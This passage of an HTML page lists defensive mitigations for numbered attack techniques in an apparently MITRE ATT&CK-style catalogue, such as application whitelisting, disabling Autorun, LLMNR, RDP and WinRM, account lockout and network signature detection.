<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_physical_medium_mitigation_t1052"><a class="anchor" href="#_exfiltration_over_physical_medium_mitigation_t1052"></a><a class="link" href="#_exfiltration_over_physical_medium_mitigation_t1052">Exfiltration Over Physical Medium Mitigation - T1052</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_shimming_mitigation_t1138"><a class="anchor" href="#_application_shimming_mitigation_t1138"></a><a class="link" href="#_application_shimming_mitigation_t1138">Application Shimming Mitigation - T1138</a></h3>
<div class="paragraph">
<p>There currently aren&#8217;t a lot of ways to mitigate application shimming. Disabling the Shim Engine isn&#8217;t recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.</p>
</div>
<div class="paragraph">
<p>Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</p>
</div>
</div>
<div class="sect2">
<h3 id="_local_job_scheduling_mitigation_t1168"><a class="anchor" href="#_local_job_scheduling_mitigation_t1168"></a><a class="link" href="#_local_job_scheduling_mitigation_t1168">Local Job Scheduling Mitigation - T1168</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_files_and_directories_mitigation_t1158"><a class="anchor" href="#_hidden_files_and_directories_mitigation_t1158"></a><a class="link" href="#_hidden_files_and_directories_mitigation_t1158">Hidden Files and Directories Mitigation - T1158</a></h3>
<div class="paragraph">
<p>Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.</p>
</div>
</div>
<div class="sect2">
<h3 id="_space_after_filename_mitigation_t1151"><a class="anchor" href="#_space_after_filename_mitigation_t1151"></a><a class="link" href="#_space_after_filename_mitigation_t1151">Space after Filename Mitigation - T1151</a></h3>
<div class="paragraph">
<p>Prevent files from having a trailing space after the extension.</p>
</div>
</div>
<div class="sect2">
<h3 id="_office_application_startup_mitigation_t1137"><a class="anchor" href="#_office_application_startup_mitigation_t1137"></a><a class="link" href="#_office_application_startup_mitigation_t1137">Office Application Startup Mitigation - T1137</a></h3>
<div class="paragraph">
<p>Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)</p>
</div>
<div class="paragraph">
<p>For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)</p>
</div>
<div class="paragraph">
<p>Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_encoding_mitigation_t1132"><a class="anchor" href="#_data_encoding_mitigation_t1132"></a><a class="link" href="#_data_encoding_mitigation_t1132">Data Encoding Mitigation - T1132</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_source_mitigation_t1153"><a class="anchor" href="#_source_mitigation_t1153"></a><a class="link" href="#_source_mitigation_t1153">Source Mitigation - T1153</a></h3>
<div class="paragraph">
<p>Due to potential legitimate uses of source commands, it&#8217;s may be difficult to mitigate use of this technique.</p>
</div>
</div>
<div class="sect2">
<h3 id="_dll_side_loading_mitigation_t1073"><a class="anchor" href="#_dll_side_loading_mitigation_t1073"></a><a class="link" href="#_dll_side_loading_mitigation_t1073">DLL Side-Loading Mitigation - T1073</a></h3>
<div class="paragraph">
<p>Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.</p>
</div>
</div>
<div class="sect2">
<h3 id="_launchctl_mitigation_t1152"><a class="anchor" href="#_launchctl_mitigation_t1152"></a><a class="link" href="#_launchctl_mitigation_t1152">Launchctl Mitigation - T1152</a></h3>
<div class="paragraph">
<p>Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rootkit_mitigation_t1014"><a class="anchor" href="#_rootkit_mitigation_t1014"></a><a class="link" href="#_rootkit_mitigation_t1014">Rootkit Mitigation - T1014</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_modify_registry_mitigation_t1112"><a class="anchor" href="#_modify_registry_mitigation_t1112"></a><a class="link" href="#_modify_registry_mitigation_t1112">Modify Registry Mitigation - T1112</a></h3>
<div class="paragraph">
<p>Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through Service Registry Permissions Weakness. Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.</p>
</div>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_time_discovery_mitigation_t1124"><a class="anchor" href="#_system_time_discovery_mitigation_t1124"></a><a class="link" href="#_system_time_discovery_mitigation_t1124">System Time Discovery Mitigation - T1124</a></h3>
<div class="paragraph">
<p>Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_appcert_dlls_mitigation_t1182"><a class="anchor" href="#_appcert_dlls_mitigation_t1182"></a><a class="link" href="#_appcert_dlls_mitigation_t1182">AppCert DLLs Mitigation - T1182</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_network_connections_discovery_mitigation_t1049"><a class="anchor" href="#_system_network_connections_discovery_mitigation_t1049"></a><a class="link" href="#_system_network_connections_discovery_mitigation_t1049">System Network Connections Discovery Mitigation - T1049</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_dynamic_data_exchange_mitigation_t1173"><a class="anchor" href="#_dynamic_data_exchange_mitigation_t1173"></a><a class="link" href="#_dynamic_data_exchange_mitigation_t1173">Dynamic Data Exchange Mitigation - T1173</a></h3>
<div class="paragraph">
<p>Ensure Protected View is enabled. (Citation: Microsoft Protected View)</p>
</div>
<div class="paragraph">
<p>Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017)</p>
</div>
</div>
<div class="sect2">
<h3 id="_llmnr_nbt_ns_poisoning_mitigation_t1171"><a class="anchor" href="#_llmnr_nbt_ns_poisoning_mitigation_t1171"></a><a class="link" href="#_llmnr_nbt_ns_poisoning_mitigation_t1171">LLMNR/NBT-NS Poisoning Mitigation - T1171</a></h3>
<div class="paragraph">
<p>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)</p>
</div>
<div class="paragraph">
<p>Use host-based security software to block LLMNR/NetBIOS traffic.</p>
</div>
</div>
<div class="sect2">
<h3 id="_screen_capture_mitigation_t1113"><a class="anchor" href="#_screen_capture_mitigation_t1113"></a><a class="link" href="#_screen_capture_mitigation_t1113">Screen Capture Mitigation - T1113</a></h3>
<div class="paragraph">
<p>Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_admin_shares_mitigation_t1077"><a class="anchor" href="#_windows_admin_shares_mitigation_t1077"></a><a class="link" href="#_windows_admin_shares_mitigation_t1077">Windows Admin Shares Mitigation - T1077</a></h3>
<div class="paragraph">
<p>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_deobfuscate_decode_files_or_information_mitigation_t1140"><a class="anchor" href="#_deobfuscate_decode_files_or_information_mitigation_t1140"></a><a class="link" href="#_deobfuscate_decode_files_or_information_mitigation_t1140">Deobfuscate/Decode Files or Information Mitigation - T1140</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_clear_command_history_mitigation_t1146"><a class="anchor" href="#_clear_command_history_mitigation_t1146"></a><a class="link" href="#_clear_command_history_mitigation_t1146">Clear Command History Mitigation - T1146</a></h3>
<div class="paragraph">
<p>Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).</p>
</div>
</div>
<div class="sect2">
<h3 id="_modify_existing_service_mitigation_t1031"><a class="anchor" href="#_modify_existing_service_mitigation_t1031"></a><a class="link" href="#_modify_existing_service_mitigation_t1031">Modify Existing Service Mitigation - T1031</a></h3>
<div class="paragraph">
<p>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_third_party_software_mitigation_t1072"><a class="anchor" href="#_third_party_software_mitigation_t1072"></a><a class="link" href="#_third_party_software_mitigation_t1072">Third-party Software Mitigation - T1072</a></h3>
<div class="paragraph">
<p>Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.</p>
</div>
<div class="paragraph">
<p>Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through Exploitation of Vulnerability.</p>
</div>
<div class="paragraph">
<p>If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</p>
</div>
</div>
<div class="sect2">
<h3 id="_video_capture_mitigation_t1125"><a class="anchor" href="#_video_capture_mitigation_t1125"></a><a class="link" href="#_video_capture_mitigation_t1125">Video Capture Mitigation - T1125</a></h3>
<div class="paragraph">
<p>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_extra_window_memory_injection_mitigation_t1181"><a class="anchor" href="#_extra_window_memory_injection_mitigation_t1181"></a><a class="link" href="#_extra_window_memory_injection_mitigation_t1181">Extra Window Memory Injection Mitigation - T1181</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_install_root_certificate_mitigation_t1130"><a class="anchor" href="#_install_root_certificate_mitigation_t1130"></a><a class="link" href="#_install_root_certificate_mitigation_t1130">Install Root Certificate Mitigation - T1130</a></h3>
<div class="paragraph">
<p>HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_brute_force_mitigation_t1110"><a class="anchor" href="#_brute_force_mitigation_t1110"></a><a class="link" href="#_brute_force_mitigation_t1110">Brute Force Mitigation - T1110</a></h3>
<div class="paragraph">
<p>Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to Valid Accounts</p>
</div>
</div>
<div class="sect2">
<h3 id="_keychain_mitigation_t1142"><a class="anchor" href="#_keychain_mitigation_t1142"></a><a class="link" href="#_keychain_mitigation_t1142">Keychain Mitigation - T1142</a></h3>
<div class="paragraph">
<p>The password for the user&#8217;s login keychain can be changed from the user&#8217;s login password. This increases the complexity for an adversary because they need to know an additional password.</p>
</div>
</div>
<div class="sect2">
<h3 id="_email_collection_mitigation_t1114"><a class="anchor" href="#_email_collection_mitigation_t1114"></a><a class="link" href="#_email_collection_mitigation_t1114">Email Collection Mitigation - T1114</a></h3>
<div class="paragraph">
<p>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.</p>
</div>
<div class="paragraph">
<p>Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_exploitation_of_vulnerability_mitigation_t1068"><a class="anchor" href="#_exploitation_of_vulnerability_mitigation_t1068"></a><a class="link" href="#_exploitation_of_vulnerability_mitigation_t1068">Exploitation of Vulnerability Mitigation - T1068</a></h3>
<div class="paragraph">
<p>Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, virtualization, and exploit prevention tools such as the Microsoft Enhanced Mitigation Experience Toolkit. (Citation: SRD EMET)</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_file_copy_mitigation_t1105"><a class="anchor" href="#_remote_file_copy_mitigation_t1105"></a><a class="link" href="#_remote_file_copy_mitigation_t1105">Remote File Copy Mitigation - T1105</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_alternative_protocol_mitigation_t1048"><a class="anchor" href="#_exfiltration_over_alternative_protocol_mitigation_t1048"></a><a class="link" href="#_exfiltration_over_alternative_protocol_mitigation_t1048">Exfiltration Over Alternative Protocol Mitigation - T1048</a></h3>
<div class="paragraph">
<p>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network. For example, if services like FTP are not required for sending information outside of a network, then block FTP-related ports at the network perimeter. Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. (Citation: TechNet Firewall Design) These actions will help reduce command and control and exfiltration path opportunities.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_private_keys_mitigation_t1145"><a class="anchor" href="#_private_keys_mitigation_t1145"></a><a class="link" href="#_private_keys_mitigation_t1145">Private Keys Mitigation - T1145</a></h3>
<div class="paragraph">
<p>Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of Valid Accounts.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rc_common_mitigation_t1163"><a class="anchor" href="#_rc_common_mitigation_t1163"></a><a class="link" href="#_rc_common_mitigation_t1163">Rc.common Mitigation - T1163</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts so only authorized users can edit the rc.common file.</p>
</div>
</div>
<div class="sect2">
<h3 id="_access_token_manipulation_mitigation_t1134"><a class="anchor" href="#_access_token_manipulation_mitigation_t1134"></a><a class="link" href="#_access_token_manipulation_mitigation_t1134">Access Token Manipulation Mitigation - T1134</a></h3>
<div class="paragraph">
<p>Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.</p>
</div>
<div class="paragraph">
<p>Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of Valid Accounts. Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token. (Citation: Microsoft Replace Process Token)</p>
</div>
<div class="paragraph">
<p>Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_window_mitigation_t1143"><a class="anchor" href="#_hidden_window_mitigation_t1143"></a><a class="link" href="#_hidden_window_mitigation_t1143">Hidden Window Mitigation - T1143</a></h3>
<div class="paragraph">
<p>Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_desktop_protocol_mitigation_t1076"><a class="anchor" href="#_remote_desktop_protocol_mitigation_t1076"></a><a class="link" href="#_remote_desktop_protocol_mitigation_t1076">Remote Desktop Protocol Mitigation - T1076</a></h3>
<div class="paragraph">
<p>Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)</p>
</div>
</div>
<div class="sect2">
<h3 id="_web_service_mitigation_t1102"><a class="anchor" href="#_web_service_mitigation_t1102"></a><a class="link" href="#_web_service_mitigation_t1102">Web Service Mitigation - T1102</a></h3>
<div class="paragraph">
<p>Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_input_prompt_mitigation_t1141"><a class="anchor" href="#_input_prompt_mitigation_t1141"></a><a class="link" href="#_input_prompt_mitigation_t1141">Input Prompt Mitigation - T1141</a></h3>
<div class="paragraph">
<p>Users need to be trained to know which programs ask for permission and why. Follow mitigation recommendations for AppleScript.</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_service_scanning_mitigation_t1046"><a class="anchor" href="#_network_service_scanning_mitigation_t1046"></a><a class="link" href="#_network_service_scanning_mitigation_t1046">Network Service Scanning Mitigation - T1046</a></h3>
<div class="paragraph">
<p>Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_event_subscription_mitigation_t1084"><a class="anchor" href="#_windows_management_instrumentation_event_subscription_mitigation_t1084"></a><a class="link" href="#_windows_management_instrumentation_event_subscription_mitigation_t1084">Windows Management Instrumentation Event Subscription Mitigation - T1084</a></h3>
<div class="paragraph">
<p>Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_local_system_mitigation_t1005"><a class="anchor" href="#_data_from_local_system_mitigation_t1005"></a><a class="link" href="#_data_from_local_system_mitigation_t1005">Data from Local System Mitigation - T1005</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_custom_cryptographic_protocol_mitigation_t1024"><a class="anchor" href="#_custom_cryptographic_protocol_mitigation_t1024"></a><a class="link" href="#_custom_cryptographic_protocol_mitigation_t1024">Custom Cryptographic Protocol Mitigation - T1024</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_credentials_in_files_mitigation_t1081"><a class="anchor" href="#_credentials_in_files_mitigation_t1081"></a><a class="link" href="#_credentials_in_files_mitigation_t1081">Credentials in Files Mitigation - T1081</a></h3>
<div class="paragraph">
<p>Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)</p>
</div>
</div>
<div class="sect2">
<h3 id="_permission_groups_discovery_mitigation_t1069"><a class="anchor" href="#_permission_groups_discovery_mitigation_t1069"></a><a class="link" href="#_permission_groups_discovery_mitigation_t1069">Permission Groups Discovery Mitigation - T1069</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_logon_scripts_mitigation_t1037"><a class="anchor" href="#_logon_scripts_mitigation_t1037"></a><a class="link" href="#_logon_scripts_mitigation_t1037">Logon Scripts Mitigation - T1037</a></h3>
<div class="paragraph">
<p>Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of Valid Accounts.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_code_signing_mitigation_t1116"><a class="anchor" href="#_code_signing_mitigation_t1116"></a><a class="link" href="#_code_signing_mitigation_t1116">Code Signing Mitigation - T1116</a></h3>
<div class="paragraph">
<p>Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_remote_management_mitigation_t1028"><a class="anchor" href="#_windows_remote_management_mitigation_t1028"></a><a class="link" href="#_windows_remote_management_mitigation_t1028">Windows Remote Management Mitigation - T1028</a></h3>
<div class="paragraph">
<p>Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)</p>
</div>
</div>
<div class="sect2">
